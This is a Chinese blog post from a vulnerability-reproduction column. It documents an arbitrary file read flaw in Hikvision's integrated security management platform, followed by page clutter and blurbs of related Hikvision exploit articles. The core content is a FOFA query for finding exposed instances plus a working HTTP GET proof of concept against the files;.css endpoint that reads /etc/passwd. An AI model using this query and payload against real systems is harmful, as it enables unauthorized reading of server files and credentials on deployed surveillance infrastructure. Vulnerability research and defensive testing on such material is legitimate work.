Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞

最新推荐文章于 2024-06-12 16:32:19 发布

今天晚上早睡觉

最新推荐文章于 2024-06-12 16:32:19 发布

阅读量201

点赞数

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136589692

版权

漏洞复现专栏收录该内容

361 篇文章 115 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

产品简介

海康威视综合安防是采用基于综合管理平台（iVMS-8700）的统一管理方案，融合网络高清、行为分析、人脸识别、车牌识别以及数据挖掘等技术，并结合综合体业务需求提供多种业务对接模式，最终实现资源的统一管理，提高管理效率。

漏洞简介

Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞
影响版本：海康威视集成化综合管理软件平台

复现环境

fofa查询语句：

body="/portal/skin/isee/redblack/"

漏洞复现

漏洞链接：https://127.0.0.1/lm/api/files;.css?link=/etc/passwd
Poc

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞

Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞
复制链接

扫一扫

专栏目录

订阅专栏

海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现

0xSec

05-31

991

海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

02_【复现】海康威视综合安防管理平台任意文件读取

fushuang333的博客

12-29

949

海康威视综合安防管理平台任意文件读取。海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞

晚风不及你

01-21

1867

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。

海康威视综合安防管理平台Fastjson远程命令执行漏洞

holyxp的博客

07-24

1898

综合安防管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。

某购物商城系统commodtiy接口处存在任意文件上传漏洞

weixin_43167326的博客

05-10

764

某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

海康威视isecure center 综合安防管理平台任意文件上传漏洞

holyxp的博客

07-02

3934

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。

海康威视部分综合安防管理平台产品存在任意文件上传漏洞

Al345__的博客

11-19

1639

海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不足，攻击者可以将恶意文件上传到平台，导致获取服务权限或服务异常。攻击者利用该漏洞上传Webshell，并随后执行任意命令，对主机上相关文件进行加密，加密后缀为locked1。海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。（2）建立重要业务数据的定期备份机制，并做好权限隔离，防止勒索软件对备份数据进行加密；

HIKVISION iSecure Center 综合安防管理平台快速配置手册 V1.1.0.zip

05-11

《HIKVISION iSecure Center 综合安防管理平台快速配置手册 V1.1.0》该手册是针对HIKVISION公司的iSecure Center综合安防管理平台的快速配置指南，旨在帮助用户顺利进行系统安装、设备接入以及特殊场景配置，以...

HIKVISION iVMS-8700 综合安防管理平台软件配置指南 V3.0.0.pdf

08-14

HIKVISION iVMS-8700 综合安防管理平台软件配置指南 V3.0.0.pdf

iSecure Center综合安防管理平台配置手册 V2.0.0

01-04

【海康威视iSecure Center综合安防管理平台配置手册 V2.0.0】是针对该公司的安防管理系统的一份详细指南。iSecure Center是一个一体化、智能化的解决方案，它旨在通过集成视频监控、停车场管理、门禁控制以及报警...

HIKVISION iSecure Center 综合安防管理平台操作指南 V1.1.0.chm

09-04

HIKVISION iSecure Center 综合安防管理平台操作指南 V1.1.0

Hikvision:海康威视海康威视流媒体管理服务器任意文件读取

03-28

海康威视海康威视海康威视流媒体管理服务器任意文件读取 #USE python3 CNVD-2021-14544.py ip.txt放置在本脚本目录下

【漏洞复现】海康威视综合安防管理平台多处 FastJson反序列化RCE漏洞

siu~

06-07

823

由于海康威视综合安防管理平台使用了低版本的fastison，不出网无法远程加载恶意类也可通过本地链直接命令执行，从而获取服务器权限。

【漏洞复现】海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞

siu~

06-03

566

海康威视综合安防管理平台/orgManage/v1/orgs/download 接口处存在任意文件读取漏洞，未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件，造成信息泄露，使系统处于极不安全的状态。

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

做自己喜欢的事，并将其发挥到极致！

04-28

8375

综合安防管理平台基于统一软件技术架构理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，可获取到目标服务器系统权限以及敏感数据信息。

海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞

最新发布

WuYSec的博客

06-12

397

海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台，能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台，可以对接入的视频监控点进行集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞，可通过此漏洞读取任意文件。

【漏洞复现】Hikvision综合安防管理平台files文件上传漏洞

晚风不及你

01-22

833

HiKVISION 综合安防管理平台 env信息泄漏漏洞，2024年最新网络安全源码剖析之Framwork层消息传递

2301_76225520的博客

04-13

716

Hikvision是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。

海康威视（hikvision） isecure center 综合安防管理平台怎么开门禁卡

09-09

海康威视的iSecure Center综合安防管理平台是一种集视频监控、门禁管理、报警系统等功能于一体的安全管理软件。要开门禁卡，首先需要在iSecure Center中进行相应设置。首先，登录到iSecure Center的管理界面。在界面上可以找到“门禁管理”或类似的选项，点击进入。在门禁管理界面，可以管理所有的门禁设备和相应的相关设置。接下来，需要进行卡片管理。点击“卡片管理”或类似选项，进入卡片管理界面。在这个界面上，可以添加、删除、修改卡片信息。点击“添加”按钮，进入添加卡片的界面。在这个界面上，需要填写相关的卡片信息，如卡片号码、姓名、部门等。填写完毕后，保存并退出。在添加完卡片信息后，需要进行权限设置。点击“权限设置”或类似选项，进入权限设置界面。在这个界面上，可以设置每张卡片的权限，如进入哪些区域、在什么时间段内可以进入等。设置完权限后，即可将卡片发放给需要的人员。发放卡片时，需要将卡片与相应的读卡器进行配对。使用配对工具将卡片放在读卡器上，进行读卡器与卡片的配对操作。配对成功后，人员就可以使用该卡片进行门禁管理了。只需将卡片放在读卡器上，系统会验证卡片的有效性，并根据权限判断是否开启门禁。总的来说，通过iSecure Center综合安防管理平台开门禁卡的过程就是登录平台、进入门禁管理界面、添加卡片信息、设置权限、配对卡片与读卡器，最后使用卡片进行门禁管理。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交